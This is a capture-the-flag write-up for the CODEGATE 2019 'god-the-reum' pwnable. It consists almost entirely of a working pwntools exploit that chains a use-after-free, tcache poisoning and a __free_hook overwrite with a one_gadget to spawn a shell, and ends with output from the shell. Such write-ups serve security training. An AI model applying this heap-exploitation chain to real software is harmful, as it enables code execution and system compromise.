
CODEGATE 2019 QUAL - god-the-reum

pwn3r_45 2019. 1. 29. 23:21

Category : pwnable

Summary : use-after-free, tcache, __free_hook

Exploit

#!/usr/bin/python

from pwn import *

def cmd_create(amount):
    """Menu option 1: create a new wallet with *amount* as its balance.

    Two prompts are answered in order (menu choice, then amount).  From the
    way the script below uses it, *amount* also appears to decide the size
    of the heap chunk the binary allocates for the wallet.
    """
    for answer in (1, amount):
        ru(': ')
        sl(str(answer))

def cmd_deposit(wallet_no, amount):
    """Menu option 2: add *amount* to wallet number *wallet_no*.

    Answers three prompts in order (menu choice, wallet, amount).  The
    exploit flow in this script does not call it; it is kept so every menu
    item has a helper.
    """
    for answer in (2, wallet_no, amount):
        ru(': ')
        sl(str(answer))

def cmd_withdraw(wallet_no, amount):
    """Menu option 3: take *amount* out of wallet number *wallet_no*.

    Answers three prompts in order (menu choice, wallet, amount).  The script
    body relies on withdrawing a wallet's whole balance making the binary
    free() the wallet's buffer while the wallet itself stays listed -- that
    dangling reference is the use-after-free the whole script is built on.
    """
    for answer in (3, wallet_no, amount):
        ru(': ')
        sl(str(answer))

def cmd_show():
    """Menu option 4: return the listed wallet balances as ints, in order.

    Skips the "My Wallet List" banner, then reads one line per wallet until
    an empty line, parsing the integer that follows "ballance " (sic, the
    binary's own spelling).  A wallet whose buffer has already been freed is
    still listed, so the field presumably shows whatever the allocator left
    in the freed chunk -- which is how the script leaks a libc address.
    """
    ru(': ')
    sl(str(4))
    ru('========== My Wallet List =============\n')
    balances = []
    line = rl(False)
    while line != '':
        balances.append(int(line.split('ballance ')[1]))
        line = rl(False)
    return balances

def cmd_new_eth(wallet_no, new_eth):
    """Menu option 6: overwrite the stored value of wallet *wallet_no*.

    Unlike the other helpers, *new_eth* is sent exactly as given (no str()),
    so callers can pass packed bytes such as p64(...).  Because the binary
    writes this into the wallet's buffer even after that buffer was freed,
    this is the script's write-into-freed-memory primitive.
    """
    for answer in (6, wallet_no):
        ru(': ')
        sl(str(answer))
    ru(': ')
    sl(new_eth)

# --- target ------------------------------------------------------------------
s = process('./god-the-reum')
#s = remote('110.10.147.103', 10001)

# Short aliases; the cmd_* helpers above look these up at call time.
ru, rl, rr = s.recvuntil, s.recvline, s.recv
sl, ss = s.sendline, s.send

# Offsets into the challenge's libc.  They are build-specific (taken from the
# libc shipped with the task) and will not match any other libc build.
LIBC_LEAK_OFF = 0x3ebca0        # leaked heap-resident pointer -> libc base
LIBC_MALLOC_HOOK_OFF = 0x3ebc30
LIBC_FREE_HOOK_OFF = 0x3ed8e8
LIBC_ONE_GADGET_OFF = 0xe569f

BIG, SMALL = 0x420, 0x50        # wallet sizes: one past tcache range, one inside

# Root cause (as far as the script shows it): withdrawing a wallet's full
# balance free()s its buffer, but the wallet stays in the list and can still
# be shown and rewritten through the menu.  Every step below follows from
# that dangling pointer; dropping/nulling the wallet on withdraw would break
# the entire chain.  Note that glibc 2.32+ safe-linking mangles the tcache
# next pointer, so step 3 as written targets the older, unprotected tcache.

# 1. Create two wallets and free both buffers via full withdrawals.  The
#    large one should be too big for tcache (presumably unsorted bin, hence
#    a libc pointer in its freed header); the small one goes to tcache.
cmd_create(BIG)      # wallet 0
cmd_create(SMALL)    # wallet 1
cmd_withdraw(0, BIG)
cmd_withdraw(1, SMALL)

# 2. "show" still lists the freed wallets; wallet 0's balance field now reads
#    as a libc pointer, which pins the libc base.
libc_leak, _ = cmd_show()
libc_base = libc_leak - LIBC_LEAK_OFF
malloc_hook = libc_base + LIBC_MALLOC_HOOK_OFF
free_hook = libc_base + LIBC_FREE_HOOK_OFF
libc_one_gadget = libc_base + LIBC_ONE_GADGET_OFF

# 3. Writing into freed wallet 1 overwrites its tcache "next" pointer
#    (tcache poisoning).  Heap state recorded in the writeup at this point:
#      (0x60)   tcache_entry[4]: 0x5623649f77b0 --> 0x7f51275e38e8
cmd_new_eth(1, p64(free_hook))

# 4. Two allocations of the same size: wallet 2 gets the genuine chunk back,
#    wallet 3 is handed the poisoned "chunk" sitting on __free_hook.
cmd_create(SMALL)    # wallet 2
cmd_create(SMALL)    # wallet 3

# 5. Wallet 3's value write therefore lands on __free_hook; the next free()
#    -- withdrawing wallet 2 -- is redirected through the hook.
cmd_new_eth(3, p64(libc_one_gadget))
cmd_withdraw(2, SMALL)
ru('withdraw? : ')

s.interactive()
s.close()
$ python exploit.py
[+] Starting local process './god-the-reum': pid 2779
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)